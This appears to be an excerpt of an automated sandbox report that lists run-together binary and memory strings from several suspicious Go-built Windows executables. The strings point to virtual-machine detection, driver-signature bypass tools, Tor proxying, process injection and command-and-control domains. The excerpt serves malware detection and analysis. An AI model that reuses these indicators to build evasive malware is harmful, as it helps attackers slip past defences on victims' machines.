                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                  Source: syncUpd.exe, 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0k
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: psapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= p
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: STAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00 %+v m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3ca
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie$WINDIR% CPU (%03d %s%v: %#x, goid=, j0 = -nologo/delete19531252.5.4.32.5.
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: ameNewaPINGPOSTPathQEMUROOTH
                  Source: CGZL5y3D81OCbb2NABnHZhPM.exe, 0000000C.00000002.2361261570.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.000000000073D000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.0000000000765000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000003.2700108075.000000000073D000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000003.2700108075.0000000000765000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 0000000F.00000002.2758288970.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 0000000F.00000002.2758288970.00000000009C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: ersexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindo
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: popcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: 11VBoxSFWINDIRWD
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: pclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: sse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BE
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: LycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd acceptactivechan<-closedcookiedirectdo
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: aryvmcixn-SR-%W
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: main.isRunningInsideVMWare
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: 4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max
                  Source: syncUpd.exe, 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: rSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: tVMSrvcs|!
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: 3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: ermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: yreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdo
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: sse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.2500
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthorities
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: vmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ... exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
                  Source: syncUpd.exe, 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarez
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3256124578.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3228027262.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--D
